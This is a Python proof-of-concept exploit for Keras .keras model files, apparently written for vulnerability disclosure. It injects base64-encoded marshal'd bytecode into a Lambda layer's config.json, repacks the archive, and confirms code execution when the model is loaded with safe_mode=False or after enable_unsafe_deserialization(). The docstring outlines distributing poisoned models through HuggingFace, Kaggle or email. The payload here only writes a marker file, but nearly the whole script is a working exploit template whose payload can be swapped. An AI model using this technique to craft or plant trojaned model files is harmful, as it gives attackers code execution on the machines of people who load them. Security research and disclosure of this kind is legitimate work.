| |
| """ |
| Keras .keras Lambda Layer - Arbitrary Code Execution PoC |
| |
| VULNERABILITY: |
| .keras model files are ZIP archives containing config.json. Lambda layers |
| store base64-encoded marshal'd Python bytecode in config.json under the |
| "function" -> "config" -> "code" key. When a model is loaded with |
| safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()), |
| this bytecode is unmarshalled and executed - enabling arbitrary code execution |
| from a crafted model file. |
| |
| IMPACT: |
| Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary |
| code execution. Many official tutorials and StackOverflow answers recommend |
| safe_mode=False to load models with custom layers. HuggingFace hosts thousands |
| of .keras files that could be replaced with malicious versions. |
| |
| ATTACK VECTOR: |
| 1. Attacker creates a legitimate-looking .keras model |
| 2. Attacker replaces Lambda layer bytecode with malicious payload |
| 3. Victim downloads model from HuggingFace, Kaggle, or email |
| 4. Victim loads with safe_mode=False -> code executes silently |
| |
| AFFECTED: |
| - keras >= 3.0 (all versions using .keras format) |
| - tensorflow >= 2.16 (ships keras 3.x) |
| |
| TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12 |
| |
| Usage: |
| python3 poc_keras_lambda_ace.py |
| """ |
|
|
| import os |
| import sys |
| import json |
| import zipfile |
| import marshal |
| import base64 |
| import types |
| import tempfile |
| import shutil |
|
|
| os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3" |
|
|
| MARKER_FILE = "/tmp/keras_ace_marker.txt" |
| PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED" |
|
|
|
|
| def create_malicious_keras_model(output_path): |
| import tensorflow as tf |
| import numpy as np |
|
|
| print("[*] Step 1: Building legitimate model with Lambda layer...") |
| model = tf.keras.Sequential([ |
| tf.keras.layers.Input(shape=(5,)), |
| tf.keras.layers.Dense(10, name="dense_1"), |
| tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"), |
| tf.keras.layers.Dense(1, name="output"), |
| ]) |
| model.compile(optimizer="adam", loss="mse") |
|
|
| tmp_dir = tempfile.mkdtemp(prefix="keras_poc_") |
| legit_path = os.path.join(tmp_dir, "legit.keras") |
| model.save(legit_path) |
| print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path))) |
|
|
| print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...") |
| with zipfile.ZipFile(legit_path, "r") as zf: |
| archive_files = {name: zf.read(name) for name in zf.namelist()} |
|
|
| config = json.loads(archive_files["config.json"]) |
|
|
| evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format( |
| MARKER_FILE, PAYLOAD_MSG |
| ) |
| print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE)) |
|
|
| evil_expr = compile(evil_source, "<payload>", "eval") |
| lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0] |
|
|
| evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n" |
| print(" Encoded bytecode: {} chars".format(len(evil_b64))) |
|
|
| def inject_into_lambda(obj): |
| if isinstance(obj, dict): |
| if obj.get("class_name") == "Lambda" and "config" in obj: |
| func = obj["config"].get("function", {}) |
| if isinstance(func, dict) and "config" in func: |
| func["config"]["code"] = evil_b64 |
| print(" Injected payload into Lambda layer config") |
| return True |
| for v in obj.values(): |
| if isinstance(v, (dict, list)) and inject_into_lambda(v): |
| return True |
| elif isinstance(obj, list): |
| for v in obj: |
| if inject_into_lambda(v): |
| return True |
| return False |
|
|
| if not inject_into_lambda(config): |
| print(" ERROR: Could not find Lambda layer in config.json") |
| sys.exit(1) |
|
|
| print("[*] Step 3: Repacking .keras file with malicious config...") |
| archive_files["config.json"] = json.dumps(config).encode() |
| with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf: |
| for name, data in archive_files.items(): |
| zf.writestr(name, data) |
|
|
| print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path))) |
| shutil.rmtree(tmp_dir) |
|
|
|
|
| def test_safe_mode_true(model_path): |
| import tensorflow as tf |
| print("\n[*] Test A: Loading with safe_mode=True (default)...") |
| if os.path.exists(MARKER_FILE): |
| os.remove(MARKER_FILE) |
| try: |
| tf.keras.models.load_model(model_path) |
| print(" Model loaded (unexpected)") |
| return os.path.exists(MARKER_FILE) |
| except Exception as e: |
| print(" Blocked as expected: {}".format(str(e)[:150])) |
| return False |
|
|
|
|
| def test_safe_mode_false(model_path): |
| import tensorflow as tf |
| import numpy as np |
| print("\n[*] Test B: Loading with safe_mode=False...") |
| if os.path.exists(MARKER_FILE): |
| os.remove(MARKER_FILE) |
| try: |
| loaded = tf.keras.models.load_model(model_path, safe_mode=False) |
| print(" Model loaded with safe_mode=False") |
|
|
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| content = f.read().strip() |
| print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) |
| return True |
|
|
| print(" No execution on load. Running inference...") |
| result = loaded.predict(np.random.randn(1, 5), verbose=0) |
| print(" Inference result: {}".format(result)) |
|
|
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| content = f.read().strip() |
| print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) |
| return True |
|
|
| print(" No ACE triggered") |
| return False |
| except Exception as e: |
| print(" Error: {}".format(str(e)[:300])) |
| return False |
|
|
|
|
| def test_enable_unsafe_deserialization(model_path): |
| import tensorflow as tf |
| import numpy as np |
| print("\n[*] Test C: Loading with enable_unsafe_deserialization()...") |
| if os.path.exists(MARKER_FILE): |
| os.remove(MARKER_FILE) |
| try: |
| tf.keras.config.enable_unsafe_deserialization() |
| loaded = tf.keras.models.load_model(model_path) |
| print(" Model loaded with enable_unsafe_deserialization") |
|
|
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| content = f.read().strip() |
| print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) |
| return True |
|
|
| print(" No execution on load. Running inference...") |
| result = loaded.predict(np.random.randn(1, 5), verbose=0) |
|
|
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| content = f.read().strip() |
| print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) |
| return True |
|
|
| print(" No ACE triggered") |
| return False |
| except Exception as e: |
| print(" Error: {}".format(str(e)[:300])) |
| return False |
|
|
|
|
| def main(): |
| print("=" * 70) |
| print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC") |
| print("=" * 70) |
|
|
| script_dir = os.path.dirname(os.path.abspath(__file__)) |
| malicious_model = os.path.join(script_dir, "malicious_lambda.keras") |
|
|
| if os.path.exists(MARKER_FILE): |
| os.remove(MARKER_FILE) |
|
|
| create_malicious_keras_model(malicious_model) |
|
|
| ace_safe = test_safe_mode_true(malicious_model) |
| ace_unsafe = test_safe_mode_false(malicious_model) |
| ace_global = test_enable_unsafe_deserialization(malicious_model) |
|
|
| print("\n" + "=" * 70) |
| print("RESULTS:") |
| print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)")) |
| print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE")) |
| print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE")) |
| print() |
|
|
| if ace_unsafe or ace_global: |
| print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary") |
| print("code execution when loaded with safe_mode=False or after calling") |
| print("enable_unsafe_deserialization().") |
| print() |
| print("Marker file: {}".format(MARKER_FILE)) |
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| print("Contents: {}".format(f.read().strip())) |
| print("\nMalicious model saved to: {}".format(malicious_model)) |
| else: |
| print("No ACE triggered. Check TensorFlow/Keras version.") |
|
|
| print("=" * 70) |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|